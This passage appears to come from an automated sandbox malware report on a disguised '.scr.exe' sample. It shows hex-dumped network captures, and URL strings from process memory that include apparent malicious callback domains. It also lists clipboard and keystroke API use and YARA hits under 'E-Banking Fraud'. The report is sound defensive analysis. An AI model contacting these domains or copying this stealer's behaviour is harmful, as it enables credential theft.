f9 ed b1 d4 
03 03 18 de 07 e2 ba 42 6b e1 e6 ae 05 74 06 dc c8 f3 cf 37 72 3d fb 57 33 5f 77 c5 c6 38 4d d0 ef a7 bd 8e 4d 2e ed 6d ec ea 94 b7 1c 59 9f 1c ea d7 49 dc 87 95 9b 94 37 64 be 23 09 03 38 fa c1 94 c2 f4 cd 94 c7 f8 27 40 bb d6 c7 0d f5 17 1c ef b3 aa ca 92 87 41 bf c7 db 61 7b 79 5d 61 09 1d 5e 0f 5e 49 e2 1d fd 5b 31 f4 ea be 77 5c 3b 2b ac 5e 7f 0f 03 e0 52 dc a2 77 42 ef 37 7a 95 38 f0 47 0c 7b a5 8d 4f f7 79 08 b2 c6 2d ae f0 f5 9e 8d 07 2f b3 eb f2 f3 61 0b f8 99 e6 d6 72 5e 99 c0 e8 21 31 1e be 31 78 c5 c4 e7 28 7e f5 6b 1f 29 ea 17 c4 58 c7 37 ba f9 6e 69 61 7a f1 d9 1f f8 bc 38 2c ab fb 4b 58 e9 01 9f ba 83 ac ae ca 10 38 84 fe e3 8d fd 5e 91 af dc dd 38 e3 ef f0 ba ea 7f 3b 2d e0 29 0e 6f d8 f2 e2 ac b7 af de 33 be df e1 a2 69 2b 0e 7d a0 64 1b dc 10 dc e2 6d fc 8d e4 d7 1b bb 79 01 fd 47 3b 5d 02 2e 88 51 9f f9 b0 de 11 dc 87 89 e5 df aa f1 fb a1 3e f5 bd 97 a5 fd 2d 07 04 a8 db f3 f5 31 b7 7d 89 8f fb 2c 76 de 4e d1 cb f1 fa 94 3f ca a0 cd 0a e7 7e 0f 30 12 81 18 d5 ff b9 b7 e2 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Tue, 14 Jan 2025 09:25:25 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 42 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 07 d1 db 3d bb ba 21 09 90 90 04 02 84 c3 71 42 e8 8e ae e8 0e 1b 7e 20 bf 86 9f cc 25 ba 7b 9a 66 ba cf cc 3a fc c3 35 13 81 a4 aa ca ca ca fc 32 b3 3a b3 7e fb ed b7 c7 7f e2 16 ec ca 54 f9 41 50 25 f1 b7 df 1e 9f 7f 06 a0 3d 06 ae e5 7c fb ed f2 98 b8 95 05 46 54 f9 bd 7b ac c3 e6 e9 8e cd d2 ca 4d ab fb ea 94 bb 77 03 fb f9 ed e9 ae 72 bb 0a ee 49 fc 65 60 07 56 51 ba d5 53 5d 79 f7 d4 dd a7 74 2c 3b 70 ef fb f9 45 16 5f 11 4a b3 7b bb ef fa 74 a2 5a 58 7e 62 fd 23 33 f8 2e 0f 0b b7 bc 9a 82 bc a3 9e 5a 89 fb 74 d7 84 6e 9b 67 45 75 35 ac 0d 9d 2a 78 72 dc 26 b4 dd fb cb cb 97 41 98 86 55 68 c5 f7 a5 6d c5 ee 13 fa f5 3b a9 2a ac 62 f7 1b 81 10 03 25 ab 06 93 ac 4e 9d 47 f8 f9 e3 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 fb cc 39 0d fe 7e 19 da bf f6 cd 03 d2 b9 f7 ac 24 8c 4f 0f 03 ba 00 cb 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 9c 56 86 67 f7 61 80 12 79 f7 be 33 0e 53 f7 3e 70 43 3f a8 40 f7 57 02 a3 c8 11 4a 60 e3 f7 a3 f6 96 1d f9 45 bf 07 a0 a2 38 2b 1e 06 ff ec 5d da fb 61 af 7d d8 04 c7 70 e4 7d 5f 6e 39 4e 98 fa 0f 83 9b ef 89 55 f8 61 fa ee f3 7f 7e 67 bf 74 ed 2a cc d2 2f 60 eb 59 e5 16 37 f2 70 c2 32 8f 2d 20 8b 7d 9c d9 d1 ff c1 72 5f 7b fc 59 40 22 b7 2b 3d 33 79 1f bb 1e 90 92 55 57 d9 fb c5 5e ba 8b 67 29 fe d8 ff b6 f7 01 8a 5c 6b e0 6d a7 5f 01 22 f3 2c 2d dd fb 30 f5 b2 9b 8d be ca 95 bd b4 b7 b5 af a6 97 95 55 d5 25 d0 8e e3 de 4c be a0 e6 59 fd 24 82 fc cb 1f cd 2e 5c ab cc d2 cf e7 63 e4 f5 fc 1e 92 9f a9 e0 8a b3 8b 4c ed ea b2 af 2f df 35 0b f6 db af 75 df 3b 8a 9b 05 5f 77 8b 5c da 87 fc f6 58 
ea 81 01 0c ef 03 71 5d a1 b5 70 73 d7 02 3a 03 6e e4 f9 f1 8d 5c cf fe d5 c8 d7 55 b1 31 4e 13 f4 fb 61 af 7d 93 4b 7b eb bb da e5 2d 47 d6 27 9b fa 75 12 f7 61 e5 26 e5 0d 99 ef 48 c2 00 8e 7e 30 a5 30 7d 33 e5 31 fe 09 d0 ae f5 71 43 fd 05 c7 fb ac aa b2 e4 61 d0 af f1 b6 d9 5e 5e 57 58 42 87 d7 9d 57 92 78 47 ff 56 0c bd ba ef 1d d7 ce 0a ab d7 df c3 00 b8 14 b7 e8 9d d0 fb 85 5e 25 0e fc 11 c3 5e 69 e3 d3 75 1e 82 ac 71 8b 2b 7c bd 67 e3 c1 cb ec ba fc bc db 02 7e a6 b9 b5 9c 57 26 30 7a 48 8c 87 6f 0c 5e 31 f1 39 8a 5f fd da 47 8a fa 05 31 d6 f1 8d 6e be 5b 5a 98 5e 7c f6 07 3e 2f 0e cb ea fe 12 56 7a c0 a7 ee 20 ab ab 32 04 0e a1 7f 79 63 bf 57 e4 2b 77 37 ce f8 3b bc ae be bf ed 16 f0 14 87 37 6c 79 71 d6 db 57 ef 19 df af 70 d1 b4 15 87 3e 50 b2 0d 4e 08 6e f1 d6 ff 46 f2 eb 8d dd bc 80 fe a3 95 2e 01 17 c4 a8 cf 7c 58 ef 08 ee c3 c4 f2 6f d5 f8 7d 53 9f fa de cb d4 fe 94 03 02 d4 ed fe fa 98 db be c4 c7 7d 16 3b 6f bb e8 e5 78 bd cb 1f 65 d0 66 85 73 bf 07 18 89 40 8c ea 7f ee ad 38 7e 4f e0 97 76 05 82 3a 00 f7 00 c
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Tue, 14 Jan 2025 09:25:27 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 35 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 
3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 14 Jan 2025 09:25:55 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 14 Jan 2025 09:25:58 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 14 Jan 2025 09:26:00 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 14 Jan 2025 09:26:03 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 14 Jan 2025 09:26:08 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Pt32mz4Hjf5wEYEo84%2FdHhvMrBqOd9qGOnyw2tkOof0KdwmNOSE8nVKByZycViJhT%2F82LZwvB6SZcNzltYxE6tBD0Icnv1pfWwHcmjNspDZy4qrksAN6UH9zvhU%2BsLUlWyoafdocWILSdJf"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 901c953158fa4309-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1683&rtt_var=841&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=727&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 14 Jan 2025 09:26:11 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FhQRVzxcARiCQFR76qX%2FN8cdbofdEwLUmRg7fc8VBQCvK441%2FvI%2FOL79ouJLyUIrDU5HIIGn0YYpAXTkEnMgs2pjpNomBCORkK4g23UaxOE1CIFlSxWB1SNTS%2Fgr7pVmqolT9nxNaJtbbe3A"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 901c95414d2ede92-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1715&rtt_var=857&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 14 Jan 2025 09:26:13 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FbP2NoBQfclcAsHdBnv16qAEYZDiHZ188yjA%2BJczaFFo9aSzii9rYnhH2qSVZZfPYZSrjsIcgTNLb9oUkIzq%2B3%2BAC0RzvC7koCGhtCvF1t8Z2IYjInbVRQzJXHlSSuJVN%2FH9BJe8oGaz%2BKm%2F"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 901c955129674304-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1552&rtt_var=776&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10829&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 14 Jan 2025 09:26:16 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BzaA1sj8tH4vEN1ikzeHVNTgk3%2BFvNQpBorj0w%2Frdj2W7%2FKHomoVCySaB5gc9KlsJ8ilVVUNucfOwUT0vE7CQcRtnv25WQrLx3rwHQGrKeBkvI3x63jbORSdYv2e%2BAdyeIkMvQJlnEoUCs9E"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 901c95612cfd1a30-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=2024&min_rtt=2024&rtt_var=1012&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=448&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a | Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: verclsid.exe, 00000003.00000002.3550509142.00000000060BC000.00000004.10000000.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3549816270.0000000003D6C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: verclsid.exe, 00000003.00000002.3550509142.0000000006A28000.00000004.10000000.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3549816270.00000000046D8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://quickcommerce.cloud/rdfj/?wz4=W22N1n9VK5BsDegKssi59d1tdmClQzQM6krhrjkO5qQUOhZ23fqPP0igRbfRb/L
                Source: zalkpCfMwtnpQo.exe, 00000007.00000002.3551901085.00000000057C6000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.xpremio.online
                Source: zalkpCfMwtnpQo.exe, 00000007.00000002.3551901085.00000000057C6000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.xpremio.online/8vp1/
                Source: verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: verclsid.exe, 00000003.00000002.3548335775.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3548335775.00000000033A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: verclsid.exe, 00000003.00000002.3548335775.00000000033C6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: verclsid.exe, 00000003.00000002.3548335775.00000000033A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: verclsid.exe, 00000003.00000002.3548335775.00000000033C6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: verclsid.exe, 00000003.00000002.3548335775.00000000033A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Ia)a
                Source: verclsid.exe, 00000003.00000002.3548335775.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3548335775.00000000033A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: verclsid.exe, 00000003.00000002.3548335775.0000000003385000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: verclsid.exe, 00000003.00000003.2016552884.000000000805D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Code function: 0_2_004CEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Code function: 0_2_004CED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Code function: 0_2_004BAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Code function: 0_2_004E9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                E-Banking Fraud

                Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000003.00000002.3548246487.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3548136805.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3551901085.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3547874217.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1829643197.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1835373056.00000000091A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1830333241.0000000005AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
